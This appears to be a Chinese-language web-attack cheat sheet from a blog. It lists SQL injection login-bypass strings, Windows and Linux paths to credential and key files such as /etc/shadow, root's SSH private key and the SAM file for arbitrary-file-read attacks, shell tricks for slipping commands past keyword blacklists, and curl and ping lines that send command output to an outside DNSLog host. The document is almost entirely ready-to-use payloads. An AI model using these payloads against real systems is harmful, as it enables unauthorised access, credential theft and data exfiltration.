漏洞利用技巧速查

漏洞利用技巧速查

万能密码

' or 1='1
'or'='or'
'or 1=1/*
1' or '1'='1
admin
admin'--
admin' or 1=1--
admin' or 1=1/*
admin' or '1'='1'--
admin' or 'a'='a

任意文件下载/读取

常见敏感文件路径

Windows系统
C:\boot.ini	# 查看系统版本
C:\Windows\System32\inetsrv\MetaBase.xml	# IIS配置文件
C:\Windows\repair\sam	# 系统初次安装密码
C:\Program Files\mysql\my.ini	# MySQL系统配置
C:\Program Files\mysql\data\mysql\user.MYD	# MySQL用户密码
C:\Windows\php.ini	# php配置文件
C:\Windows\win.ini	# Windows配置文件
Linux系统
/root/.ssh/authorized_keys	# 公钥文件
/root/.ssh/id_rsa	# 私钥文件
/root/.ssh/known_hosts	# 每个访问计算机用户的公钥
/etc/passwd	# 用户信息
/etc/shadow	# 用户密码信息
/etc/my.conf	# MySQL配置文件
/etc/httpd/conf/httpd.conf	# Apache配置文件
/root/.bash_history	# 历史命令
/root/.mysql_history	# MySQL历史命令
/var/lib/mlocate/mlocate.db	# 全文件路径
/usr/local/app/apache2/conf/httpd.conf	# P、Apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf	# 虚拟网站设置
/usr/local/app/php7/lib/php.ini	# php配置文件
/etc/php5/apache2/php.ini	# Ubuntu默认php配置文件路径

黑名单关键字绕过

字符串拼接绕过

a=c;b=at;c=tex;d=t;$a$b ${c}${d}

环境变量绕过

echo ${SHELLOPTS} 
echo ${SHELLOPTS:3:1} 
${SHELLOPTS:3:1}at${IFS}text

空变量绕过

cat t${x}ext

通配符绕过

/bin/ca? tex? 

DnsLog

Command Execution

Linux
curl http://ip.port..ceye.io/`whoami`
ping `whoami`.ip.port..ceye.io
Windows
ping %USERNAME%..ceye.io

你可能感兴趣的:(Web安,web安全)